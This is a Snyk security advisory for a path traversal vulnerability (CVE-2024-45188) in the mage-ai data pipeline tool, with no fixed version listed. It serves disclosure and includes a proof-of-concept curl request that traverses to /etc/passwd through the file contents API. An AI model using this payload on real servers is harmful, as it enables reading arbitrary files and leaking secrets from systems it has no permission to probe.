Path Traversal Affecting mage-ai package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (10th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-MAGEAI-7830469
- published 25 Aug 2024
- disclosed 23 Aug 2024
- credit Ori Hollander
Introduced: 23 Aug 2024
CVE-2024-45188 Open this link in a new tabHow to fix?
There is no fixed version for mage-ai
.
Overview
mage-ai is a Mage is a tool for building and deploying data pipelines.
Affected versions of this package are vulnerable to Path Traversal via the File Content
request. An attacker with Viewer
permissions can leak arbitrary files from the server by exploiting insufficient validation of user-supplied input.
PoC
curl -X GET
'http://localhost:6789/api/file_contents/..%2F..%2F..%2Fetc%2Fpasswd?api_key=
<USER API KEY>' -H 'Authorization: Bearer
<USER TOKEN>'